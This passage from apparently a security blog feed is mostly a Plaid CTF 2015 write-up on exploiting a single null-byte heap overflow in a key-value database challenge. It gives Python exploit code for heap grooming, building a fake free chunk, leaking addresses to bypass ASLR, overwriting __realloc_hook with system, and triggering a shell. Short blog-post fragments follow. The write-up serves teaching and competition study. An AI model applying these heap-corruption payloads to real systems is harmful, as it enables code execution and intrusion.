contains data, we know this because it is not the right size for a node (0x38)
and it has never been reallocated so it can’t be a key itself.</p>
<p>What happens is that the last operation of the crashing test case is a DEL, the
yellow block that is being reallocated is a new key and when it’s done it tries
to free the red (data) block and crashes. This is shown by villoc by coloring
the state in red and marking the faulty block.</p>
<p>Remember this is the block the green block overflowed into, so why exactly does
this cause <code class="highlighter-rouge">free</code> to abort with a message about an invalid pointer? It turns out
the reason for this is pretty unsatisfying: We corrupted the malloc meta-data at
the beginning of the block. That’s really all it is.</p>
<h1 id="taking-control-of-the-application">Taking control of the application</h1>
<p>Project Zero <a href="http://googleprojectzero.blogspot.fr/2014/08/the-poisoned-nul-byte-2014-edition.html">talked about this</a> and explains how it is possible to setup the
heap in such a way that a single null byte overflow can be leveraged to attack
the heap. That exact attack wasn’t usable because it relies on Fedora not
activating some <code class="highlighter-rouge">assert</code>s in production code but the challenge was running on
Ubuntu which <em>does</em> activate them. I took a different road and only the initial
corruption is the same.</p>
<p>When doing exploitation and not immediately being able to influence data
controlling the execution flow one must always ask the following question:
<strong>What <em>do</em> I control?</strong> This is simply what you’ll have to work with, so make
sure to be exclusive with your list.</p>
<p>The header of a chunk is its size, this size is always a multiple of 16. This is
important because the lower bits are used as flags:</p>
<pre><code class="language-C++">#define PREV_INUSE 0x1 // previous adjacent chunk is in use
#define IS_MMAPPED 0x2 // the chunk was obtained with mmap()
#define NON_MAIN_ARENA 0x4 // the chunk isn't in the main arena
// I'm not so sure those comments are really useful though.
</code></pre>
<p>On little-endian architectures those are the bits we’ll be overflowing with our
null byte. If the size of the chunk we are overflowing into is a multiple of 256
then we’ll exactly clear those bits without changing the block’s size which
could have consequences and make our lives harder.</p>
<p>Clearing <code class="highlighter-rouge">IS_MAPPED</code> and <code class="highlighter-rouge">NON_MAIN_ARENA</code> is probably harmless as they’d
probably be zero already. This leaves us with <code class="highlighter-rouge">PREV_INUSE</code> which is promissing
because it is guaranteed that we are changing something here. The block
preceding the block we are corrupting is obviously the block we are overflowing
and therefore it should always be in use. So what happens if we mark it as
freed?</p>
<p>Remember the null byte is written past the green block and corrupting the flags
of the red one.</p>
<p>When freeing the red block it will check the block preceding it. If it is free
the two blocks will be merged. When a block is not used malloc stores meta-data
not only in the header but also in places where there would normally be user
data. In particular <strong>it stores the size of the free block at the very end of
the block</strong>. This way when the red block is being freed and it notices the
previous block is supposed to be free as well, it can find the beginning of the
supposedly free block by looking right in front of its own header to get the
size of the previous block. Because the previous block, <strong>the green one</strong>, isn’t
actually free the data <code class="highlighter-rouge">free()</code> looks at when getting this size is <strong>controlled
by us</strong>.</p>
<p>Now we know what we really control through this one null byte overwriting some
malloc bookkeeping. The question is what to do with it. Project Zero sets a size
such that the header of the supposedly free block is designer controlled. Then
they craft a fake header somewhere containing arbitrary pointers that will
eventually cause an old school unlink-type write-what-where. Even if we were
targeting Fedora and this could work, we wouldn’t be able to pull it off because
we never bypassed ASLR and the challenge is PIE. This means <strong>we’ll need to make
our fake chunk start at an existing free chunk</strong>, that’s the only place where
we’ll find valid pointers.</p>
<p>After spending some time on this and a lot of experimentation I came to the
conclusion that it’s a bad idea to end-up with a node, its key and its data
inside the fake free chunk. Because it makes it more difficult to leverage it in
the end since overwriting some part will probably overwrite the previous parts
as well and as we haven’t leaked ASLR yet it’ll be hard to craft a consistent
data structure for the application to work with.</p>
<p>From now on I’ll explain parts of the heap feng shui used in my final
exploit. The full visualization of this can be found <a href="/public/res/single-null-byte-heap-overflow/exploit.html">here</a>.</p>
<p><a href="/public/res/single-null-byte-heap-overflow/exploit.html"><img src="/public/res/single-null-byte-heap-overflow/create_hole.png" alt="first part of the full exploit" /></a>
This is the first part of <a href="/public/res/single-null-byte-heap-overflow/exploit.html">the full exploit visualization here</a>.</p>
<p>You’ll learn to recognize the basic pattern of allocating a node (green), this
is done even for look-ups of existing keys, followed by a malloc and optional
re-allocations for the key (sea green), and finally a malloc of a user
controlled size for the data (red). This pattern is repeated with the purple,
brown, yellow sequence. The corresponding operations are:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># This makes a hole between x's key and value.
</span><span class="n">PUT</span><span class="p">(</span><span class="n">b</span><span class="s">"x"</span> <span class="o">*</span> <span class="mh">0x100</span><span class="p">,</span> <span class="n">b</span><span class="s">"X"</span> <span class="o">*</span> <span class="mh">0xff</span><span class="p">)</span>
<span class="n">PUT</span><span class="p">(</span><span class="n">b</span><span class="s">"x"</span> <span class="o">*</span> <span class="mh">0x100</span><span class="p">,</span> <span class="n">b</span><span class="s">"X"</span> <span class="o">*</span> <span class="mh">0xff</span><span class="p">)</span>
</code></pre></div></div>
<p>We made a hole. The freed block in the middle will be the one we’ll make our
fake free chunk point to. Then the <em>messy</em> zone will only affect the data which
we don’t care about, it can contain anything without affecting the stability of
the application’s data.</p>
<p>Now we need to temporarily fill this hole so it’s not used by what we’ll do next.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Fill up the hole with something we can remove later.
</span><span class="n">PUT</span><span class="p">(</span><span class="n">b</span><span class="s">'pad1'</span><span class="p">,</span> <span class="n">b</span><span class="s">'B'</span> <span class="o">*</span> <span class="mh">0xe7</span><span class="p">)</span>
<span class="n">PUT</span><span class="p">(</span><span class="n">b</span><span class="s">'pad2'</span><span class="p">,</span> <span class="n">b</span><span class="s">'B'</span> <span class="o">*</span> <span class="mh">0x197</span><span class="p">)</span>
</code></pre></div></div>
<p><a href="/public/res/single-null-byte-heap-overflow/exploit.html"><img src="/public/res/single-null-byte-heap-overflow/fill_hole.png" alt="temporarily fill the created hole" /></a>
Temporarily fill the created hole (<a href="/public/res/single-null-byte-heap-overflow/exploit.html">full exploit visualization here</a>).</p>
<p>Next we need to take some precautions that are only indirectly related to what
we want to achieve. We create a large hole in which all the future allocations
will be done followed by a wall we’ll <em>never</em> touch. This will protect us
against the specific behavior when taking memory from the wilderness.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Build a wall against the wilderness.
</span><span class="n">PUT</span><span class="p">(</span><span class="n">b</span><span class="s">"_"</span> <span class="o">*</span> <span class="mh">0x80</span><span class="p">,</span> <span class="n">b</span><span class="s">"Y"</span> <span class="o">*</span> <span class="mh">0x8b0</span><span class="p">)</span>
<span class="n">PUT</span><span class="p">(</span><span class="n">b</span><span class="s">"wall"</span><span class="p">,</span> <span class="n">b</span><span class="s">"W"</span> <span class="o">*</span> <span class="mh">0x20</span><span class="p">,</span> <span class="n">trim</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
<span class="n">DEL</span><span class="p">(</span><span class="n">b</span><span class="s">"_"</span> <span class="o">*</span> <span class="mh">0x80</span><span class="p">)</span>
</code></pre></div></div>
<p><a href="/public/res/single-null-byte-heap-overflow/exploit.html"><img src="/public/res/single-null-byte-heap-overflow/build_wall.png" alt="temporarily fill the created hole" /></a>
Build a wall against the wilderness (<a href="/public/res/single-null-byte-heap-overflow/exploit.html">full exploit visualization here</a>).</p>
<h3 id="the-plan">The plan.</h3>
<p>Now the plan is to reproduce our crashing test-case in this space and we’ll be
able to make our fake chunk point to the empty space we made before (after we’ll
have deleted the temporary fillings.) We’ll end up with a huge fake free chunk
covering the data of the first allocated key (the yellow block) and whatever we
put after that if we decide to make the free chunk big enough.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Now create the setup where we can off-by-one.
</span><span class="n">PUT</span><span class="p">(</span><span class="n">b</span><span class="s">"a"</span> <span class="o">*</span> <span class="mi">247</span><span class="p">,</span> <span class="n">b</span><span class="s">"A"</span> <span class="o">*</span> <span class="mi">123</span><span class="p">)</span>
<span class="n">PUT</span><span class="p">(</span><span class="n">b</span><span class="s">"a"</span> <span class="o">*</span> <span class="mi">247</span><span class="p">,</span> <span class="n">b</span><span class="s">"A"</span> <span class="o">*</span> <span class="mi">240</span><span class="p">)</span>
</code></pre></div></div>
<p><a href="/public/res/single-null-byte-heap-overflow/exploit.html"><img src="/public/res/single-null-byte-heap-overflow/corrupt_stage1.png" alt="trigger corruption stage 1" /></a></p>
<blockquote>
<p><strong>Put:</strong> Node, Key, Val; <strong>Put again!</strong> Node, (same) Key, Val.</p>
</blockquote>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># This computation is the size of our fake free chunk.
# It should make it start at the beginning of the filled up hole we control;
</span><span class="n">fake_sz</span> <span class="o">=</span> <span class="mh">0x100</span> <span class="o">+</span> <span class="mh">0x40</span> <span class="o">+</span> <span class="mh">0x190</span> <span class="o">+</span> <span class="mh">0x40</span> <span class="o">+</span> <span class="mh">0x110</span> <span class="o">+</span> <span class="mh">0x1a0</span>
<span class="n">craftedkey</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="n">fake_sz</span><span class="p">)</span><span class="o">.</span><span class="n">rjust</span><span class="p">(</span><span class="mi">248</span><span class="p">,</span> <span class="n">b</span><span class="s">"b"</span><span class="p">)</span>
<span class="n">PUT</span><span class="p">(</span><span class="n">craftedkey</span><span class="p">,</span> <span class="n">b</span><span class="s">"B"</span> <span class="o">*</span> <span class="mi">245</span><span class="p">)</span>
</code></pre></div></div>
<p><a href="/public/res/single-null-byte-heap-overflow/exploit.html"><img src="/public/res/single-null-byte-heap-overflow/corrupt_stage2.png" alt="trigger corruption stage 3" /></a></p>
<blockquote>
<p><strong>Put:</strong> Node, (different) Key. (Val not shown, it’s to the right.)</p>
</blockquote>
<p><strong>This triggers the corruption.</strong> This time it’s right where we want it. The
key, the block that is re-allocated in the last screenshot above ends up at
<code class="highlighter-rouge">0x555555758938</code> and overwrites the first byte of the header of the data block
right after it at <code class="highlighter-rouge">0x555555758a38</code>. The effect is we clear the flags that were
stored there and in particular the <code class="highlighter-rouge">PREV_INUSE</code> flag. We effectively mark the
previous block as free and <code class="highlighter-rouge">free()</code> will attempt to merge the block we are
corrupting with its predecessor when we free it. It will find the beginning of
the previous block by looking at the size stored at the end of a free block,
right in front of the header of the block being freed. We control this size and
you can see the computation in the python code above.</p>
<p>Now let’s delete the temporary padding we setup earlier and take a look at the
state of the full heap when that’s done:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Clear the hole we made before.
</span><span class="n">DEL</span><span class="p">(</span><span class="n">b</span><span class="s">'pad1'</span><span class="p">)</span>
<span class="n">DEL</span><span class="p">(</span><span class="n">b</span><span class="s">'pad2'</span><span class="p">)</span>
</code></pre></div></div>
<p><a href="/public/res/single-null-byte-heap-overflow/exploit.html"><img src="/public/res/single-null-byte-heap-overflow/corrupt_after.png" alt="trigger corruption stage 3" /></a></p>
<p>The bottom line of this image is a screen-shot of villoc, I added big colored
rectangles on top to be able to explain more easily bellow, from left to right:</p>
<ul>
<li>
<p><strong>initial key/val</strong>: The green marker at the left shows three blocks that
never moved, those are the three memory allocation (node, key, val) for the
initial value the program stores in it’s database at the very beginning of
it’s <code class="highlighter-rouge">main</code> function.</p>
</li>
<li>
<p><strong>our hole</strong>: Next the big red marker is the result of our first operation
preserved by the padding we setup. We have a node followed by its key, a
large gap and the associated data.</p>
</li>
<li>
<p><strong>victim</strong>: The purple marker shows the victims of our corruption, first the
node and key, and further to the right the data. This data block is the one
we corrupted malloc’s bookkeeping of.</p>
</li>
<li>
<p><strong>overflower</strong>: The blocks marked in yellow are the node, key and value of
the entry we overflowed. We overflowed the key into the data marked purple.</p>
</li>
<li>
<p><strong>the wall</strong>: At the far right we have three blocks in blue that never moved,
this is the wall protecting against the wilderness.</p>
</li>
</ul>
<p>Make sure you understand this picture of the heap. We’ll free the nodes marked
purple next and see how it affect’s malloc’s representation of the heap. Keep in
mind the data (last block) of this entry is corrupted and will cause malloc to
think there is a huge freed chunk before it. We control the size of this chunk
through the last bytes of the block we overflowed (yellow data).</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Commandeer the heap.
</span><span class="n">DEL</span><span class="p">(</span><span class="n">b</span><span class="s">"a"</span> <span class="o">*</span> <span class="mi">247</span><span class="p">)</span>
</code></pre></div></div>
<p><a href="/public/res/single-null-byte-heap-overflow/exploit.html"><img src="/public/res/single-null-byte-heap-overflow/corrupt_cleared.png" alt="trigger corruption stage 3" /></a></p>
<p>As you can see this <code class="highlighter-rouge">DEL</code> causes a key to be re-allocated several times in the
space left of the wall. Once it has the full key the existing key is freed,
followed by the associated data and node. Finally the key used to do the look-up
is freed as well. <strong>This successfully freed our corrupted chunk.</strong> (The small
hole right in front of the reddish block on the right side of the image.)</p>
<p>I highlighted the region malloc considers freed after this operation in
blue. Yes it’s big. This is what we wanted and what we computed a few python
lines ago. <strong>The main corruption is now finished.</strong> The heap is a total mess and
we’ll be able to manipulate in ways the application will have several data
structures using the same memory.</p>
<p>Let’s start confusing the program. We <code class="highlighter-rouge">GET</code> the value associated with the very
first key we put in the database, this is the one where we made sure there was a
hole between the key and the data. Look what happens:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">get</span><span class="p">(</span><span class="n">b</span><span class="s">"x"</span> <span class="o">*</span> <span class="mh">0x100</span><span class="p">)</span>
</code></pre></div></div>
<p><a href="/public/res/single-null-byte-heap-overflow/exploit.html"><img src="/public/res/single-null-byte-heap-overflow/leak.png" alt="trigger corruption stage 3" /></a></p>
<p>The end of the key used for the look-up uses the same memory as the data it’s
fetching. When this <code class="highlighter-rouge">realloc</code> happens some meta-data is updated. in particular
since we took a piece of a supposedly large free chunk the header of what
remains of this chunk after the allocation needs to be written. This is in the
middle of the data. <strong>When the application prints the data we request it will
leak this header.</strong> before returning the data to the user the temporary key is
freed.</p>
<p>The header in question has some pointers to other parts of the heap and also to
some values used by malloc that are stored inside the libc. <strong>We successfully
bypassed aslr</strong> by leaking heap and libc addresses.</p>
<h1 id="alternatives-to-the-unlink-reaction">Alternatives to the unlink reaction</h1>
<p>We now control the heap, not entirely, but its enough of a mess to be able to
make some interesting constructions. We need to start thinking about what we
want to achieve with this. The next step is gaining control over the execution
flow.</p>
<p>The classic approach when exploiting structures like linked lists or trees is to
fallback to the old unlink-style <em>read-almost-what-almost-where</em> primitive. The
code for deleting elements in such data structures looks like this:</p>
<div class="language-c++ highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">to_be_deleted</span><span class="o">-></span><span class="n">next</span><span class="o">-></span><span class="n">prev</span> <span class="o">=</span> <span class="n">to_be_deleted</span><span class="o">-></span><span class="n">prev</span><span class="p">;</span>
<span class="n">to_be_deleted</span><span class="o">-></span><span class="n">prev</span><span class="o">-></span><span class="n">next</span> <span class="o">=</span> <span class="n">to_be_deleted</span><span class="o">-></span><span class="n">next</span><span class="p">;</span>
</code></pre></div></div>
<p>We could confuse the program and commandeer a node, once it will be deleted
we’ll have something looking like the code above. But there is an inherent
limitation to this style of <em>read-what-where</em>: It’s done in two directions, this
means the value we are writing must be a pointer to writable memory, because the
address we are writing to will be written back to what the value points to. Read
that again if you didn’t get it. In short with this technique you can’t
overwrite a function pointer because executable memory won’t be writable.</p>
<p>Another write-up for this challenge written by frizn can be found <a href="http://blog.frizn.fr/pctf-2015/pwn-550-plaiddb">here</a>, he
choose to solve this problem.</p>
<p>But before we’re going through the trouble of finding something we can control
the execution flow with using this technique, let’s take a moment to check if
something else is easier. To be honest i never reversed engineered the function
handling <code class="highlighter-rouge">del</code> in the target binary. One function i did look at (because it was
way smaller and i’m lazy) is the one doing the work for <code class="highlighter-rouge">put</code>. This is an
excerpt:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">old_node</span> <span class="o">=</span> <span class="n">add_node</span><span class="p">(</span><span class="n">new_node</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">old_node</span> <span class="p">)</span> <span class="p">{</span>
<span class="n">free</span><span class="p">(</span><span class="n">new_node</span><span class="o">-></span><span class="n">key</span><span class="p">);</span>
<span class="n">free</span><span class="p">(</span><span class="n">old_node</span><span class="o">-></span><span class="n">val</span><span class="p">);</span>
<span class="n">old_node</span><span class="o">-></span><span class="n">datasz</span> <span class="o">=</span> <span class="n">new_node</span><span class="o">-></span><span class="n">datasz</span><span class="p">;</span>
<span class="n">old_node</span><span class="o">-></span><span class="n">val</span> <span class="o">=</span> <span class="n">new_node</span><span class="o">-></span><span class="n">val</span><span class="p">;</span>
<span class="n">free</span><span class="p">(</span><span class="n">new_node</span><span class="p">);</span>
<span class="n">puts</span><span class="p">(</span><span class="s">"info: update successful."</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span> <span class="p">{</span>
<span class="n">puts</span><span class="p">(</span><span class="s">"info: insert successful."</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>
<p>When a key is already present in the database it updates the associated value
before freeing the <code class="highlighter-rouge">new_node</code>. My idea was to make it believe there is a node
located where i want to write to. It’ll overwrite my target with the size of the
new data we’re sending and with a pointer to this data. But you’ll see later
that we can subvert this limitation.</p>
<h4 id="how-do-we-setup-a-fake-node-anywhere-in-memory">How do we setup a fake node anywhere in memory?</h4>
<p>This is surprisingly easy, we just need to overwrite an existing node and set
it’s <code class="highlighter-rouge">left</code> or <code class="highlighter-rouge">right</code> pointer to where we want our fake node to be. The only
requirement is the first entry of our fake node should be a valid pointer
because this is supposed to be the key.</p>
<p>We’ll be able to update this node by using the <code class="highlighter-rouge">PUT</code> operation with a key
matching whatever the first pointer in our phony node happens to point to.</p>
<h4 id="how-do-we-overwrite-with-an-arbitrary-value">How do we overwrite with an arbitrary value?</h4>
<p>What I explained before is that the value being written is the size of the data
and the pointer to the data. Those aren’t arbitrary. But we get around this
thanks to particular heap setup we’ll be using. We’ll have a large controlled
(data) block that is overlapping the node we’ll be tampering with in order
to set up our fake node over the target. This same large controlled block will
also overlap it’s own key, the one used to do the <code class="highlighter-rouge">PUT</code>. Because of this we’ll
be able to set the size and data fields to whatever we want before they are
copied to the fake node located at our target.</p>
<h4 id="putting-it-together">Putting it together</h4>
<p><a href="/public/res/single-null-byte-heap-overflow/exploit.html"><img src="/public/res/single-null-byte-heap-overflow/overwrite.png" alt="trigger corruption stage 3" /></a></p>
<p>The temporary node is created in the middle because of a fastbin of the right
size, then the key to the left and the data takes the remaining space because we
made it just big enough. On the screenshot of villoc you can clearly see the
different overwrites: first we overwrite some data in the middle followed by our
own temporary node and finally we overwrite a node that already existed. We’ll
the later point to our target and setup the temporary node to point to a key
containing the right data.</p>
<p>The code bellows creates the huge data with all the right values:</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Align on a multiple of 16 so the pointer passed to free() is valid.
</span><span class="n">overwrite</span> <span class="o">=</span> <span class="n">b</span><span class="s">"0"</span> <span class="o">*</span> <span class="mi">8</span>
<span class="c1"># Craft a fake freeable key
</span><span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mh">0x101</span><span class="p">)</span> <span class="c1"># keep malloc happy
</span><span class="n">fake_key</span> <span class="o">=</span> <span class="n">data</span> <span class="o">+</span> <span class="nb">len</span><span class="p">(</span><span class="n">overwrite</span><span class="p">)</span>
<span class="n">overwrite</span> <span class="o">+=</span> <span class="n">target_key</span> <span class="o">+</span> <span class="n">b</span><span class="s">"</span><span class="se">\x00</span><span class="s">"</span>
<span class="n">overwrite</span> <span class="o">=</span> <span class="n">overwrite</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mh">0x100</span><span class="p">,</span> <span class="n">b</span><span class="s">"0"</span><span class="p">)</span>
<span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="c1"># padding
</span><span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mh">0x101</span><span class="p">)</span> <span class="c1"># keep malloc happy
</span>
<span class="c1"># This puts us at the begining of our own node.
# This is the temporary node for the PUT.
</span><span class="n">overwrite</span> <span class="o">=</span> <span class="n">overwrite</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mh">0x438</span><span class="p">,</span> <span class="n">b</span><span class="s">"1"</span><span class="p">)</span>
<span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mh">0x41</span><span class="p">)</span> <span class="c1"># keep malloc happy
</span><span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="n">fake_key</span><span class="p">)</span> <span class="c1"># we need to craft a key.
</span><span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">)</span> <span class="c1"># size
</span><span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="n">system</span><span class="p">)</span> <span class="c1"># This will be writtent to target.
</span><span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mh">0x525252</span><span class="p">)</span> <span class="c1">#
</span><span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mh">0x525253</span><span class="p">)</span> <span class="c1">#
</span><span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mh">0x525254</span><span class="p">)</span> <span class="c1">#
</span><span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span> <span class="c1"># padding
</span><span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mh">0x201</span><span class="p">)</span> <span class="c1"># keep malloc happy
</span>
<span class="c1"># Now get to the next node, we'll make it point to our target.
</span><span class="n">overwrite</span> <span class="o">=</span> <span class="n">overwrite</span><span class="o">.</span><span class="n">ljust</span><span class="p">(</span><span class="mh">0x608</span><span class="p">,</span> <span class="n">b</span><span class="s">"T"</span><span class="p">)</span>
<span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mh">0x41</span><span class="p">)</span> <span class="c1"># keep malloc happy
</span><span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="n">www</span><span class="p">)</span> <span class="c1"># we need a freable key.
</span><span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">)</span>
<span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">)</span>
<span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="n">target</span><span class="o">-</span><span class="mi">16</span><span class="p">)</span><span class="c1"># left->data == target
</span><span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mh">0x626262</span><span class="p">)</span> <span class="c1"># right
</span><span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mh">0x626263</span><span class="p">)</span> <span class="c1"># parent
</span><span class="n">overwrite</span> <span class="o">+=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s">"Q"</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>
<span class="c1"># Don't include the final \n as we normally do.
</span><span class="n">PUT</span><span class="p">(</span><span class="n">b</span><span class="s">"setup"</span><span class="p">,</span> <span class="n">overwrite</span><span class="p">,</span> <span class="n">trim</span><span class="o">=</span><span class="bp">True</span><span class="p">)</span>
</code></pre></div></div>
<p>The only thing left to do is find a suitable target and value. This is rather
easy. We’ll target <code class="highlighter-rouge">__realloc_hook</code> and overwrite it with <code class="highlighter-rouge">system</code>. This matches
our requirements because there is a valid pointer at the right offset before
<code class="highlighter-rouge">__realloc_hook</code> that can be used as the key.</p>
<p>Let’s look at what happens during the <code class="highlighter-rouge">PUT</code>:</p>
<p><a href="/public/res/single-null-byte-heap-overflow/exploit.html"><img src="/public/res/single-null-byte-heap-overflow/overwrite_followup.png" alt="trigger corruption stage 3" /></a></p>
<p>The first line is the allocation of the data that overwrites everything. Next we
see that <strong>villoc points out there is an error</strong> because we are freeing an
unknown chunk. This is the fake key we created, the update is done and it is no
longer needed. This is why it was so important this was freeable. We succeeded
because <code class="highlighter-rouge">free()</code> didn’t complain or crash. You can see villoc marks the unknown
chunk dashed and it matches where we build our fake key near the begining of our
huge data.</p>
<p>On the next line nothing seems to happen, it’s a <code class="highlighter-rouge">free(0x0)</code>. We didn’t bother
setting up a valid value for the data pointer of the temporary node after we
overwrote it and just set it to null. Finally the temporary node itself is
freed.</p>
<h4 id="now-we-get-a-shell">Now we get a shell</h4>
<p>We are almost there! Now whenever we cause a call to <code class="highlighter-rouge">realloc()</code> the hook we
installed will cause <code class="highlighter-rouge">system()</code> to be called. It’s first argument with be the
same as <code class="highlighter-rouge">realloc</code>’s: the key being re-allocated.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># Now we control __realloc_hook, trigger it.
</span><span class="n">PUT</span><span class="p">(</span><span class="n">b</span><span class="s">"sh < /dev/stdout;"</span> <span class="o">+</span> <span class="n">b</span><span class="s">":;"</span> <span class="o">*</span> <span class="mi">100</span><span class="p">,</span> <span class="n">b</span><span class="s">"foo"</span><span class="p">)</span>
</code></pre></div></div>
<h1 id="comments-and-advice">Comments and advice</h1>
<p>When working on complex data structures, be it the heap or something else, it is
important to have a good understanding of what is going on. Visualization is
essential, at least for me it is. I wrote <a href="http://github.com/wapiflapi/villoc">villoc</a> during PlaidCTF 2015 to
solve the challenge presented in this article. I made some patches afterwards to
fix some bugs, but this is nowhere near how good it could be. This version won’t
handle large programs well and it doesn’t show a lot of interesting
information. For example it would be great to have something with pintools or
even a simple shared library that could do inspection to show what data is
stored where.</p>
<p>In exploitation in general never despair when you don’t even control what you
control. Systems are so complex that even the tiniest corruptions can often be
leveraged in the right context. Your job as a designer is to understand what is
going on and master the system enough to be able to create this context.</p>
<blockquote>
<p>In virtuality there is no level of privilege, no logical barrier between
systems, no point of illegality. There is only information and those that can
invoke it. – Phantasmal Phantasmagoria</p>
</blockquote>wapiflapiWhen Phantasmal Phantasmagoria wrote The Malloc Malleficarum back in 2005 he exposed several ways of gaining control of an exploitation through corruption of the internal state of the libc memory allocator. Ten years later people are still exploring the possibilities offered by such complex data structures. In this article I will present how I solved a challenge from Plaid CTF 2015 and the tool I wrote in the process.Giving Jekyll a shot2015-01-04T00:00:00+00:002015-01-04T00:00:00+00:00https://wapiflapi.github.io/2015/01/04/giving-jekyll-a-shot<p>I’m not sure about this but since it seems to be all the hype these days I might
as well give it a try. At first I was under the impression I would miss RsT, but
then I thought what the heck, I need to get used to Markdown anyway with
everyone on github using that.</p>
<p>I’m trying the Jekyll @poole theme by @mdo, I think it’s quite to my liking even
if I had to do some modifications to fit my username as the title of the blog
without it overflowing on the content.</p>
<p>I’ve re-edited some of my previous articles in markdown and uploaded them
here. I plan to host my future writeups and thoughts here. I’ll be able to host
the associated ressources on the repo as well instead of having them scatterd
all arround the internet which is probably a good thing.</p>Wannes RomboutsI’m not sure about this but since it seems to be all the hype these days I might as well give it a try. At first I was under the impression I would miss RsT, but then I thought what the heck, I need to get used to Markdown anyway with everyone on github using that.Hack.lu’s OREO with ret2dl-resolve2014-11-17T00:00:00+00:002014-11-17T00:00:00+00:00https://wapiflapi.github.io/2014/11/17/hacklu-oreo-with-ret2dl-resolve<p>Hack.lu 2014 was really well done and entertaining. For one challenge we needed
to get <code class="highlighter-rouge">system</code> from an unknown libc while bypassing ASLR. The return to
dl-resolve technique I used wasn’t known to me and I will explain it in this
post.</p>
<p>This exploit took me a ridiculous amount of time during the CTF and is overkill
in more than one place. Nevertheless the write-up should be interesting because
the technique known as return to dl-resolve wasn’t known to me before and seems
to only be mentioned in Volume 0x0b, Issue 0x3a, Phile #0x04 and in a
<a href="http://inaz2.hatenablog.com/entry/2014/07/27/205322">Japanese writeup</a> that I
didn’t quite understand because I don’t speak Japanese.</p>
<p>Here are some links to the challenge
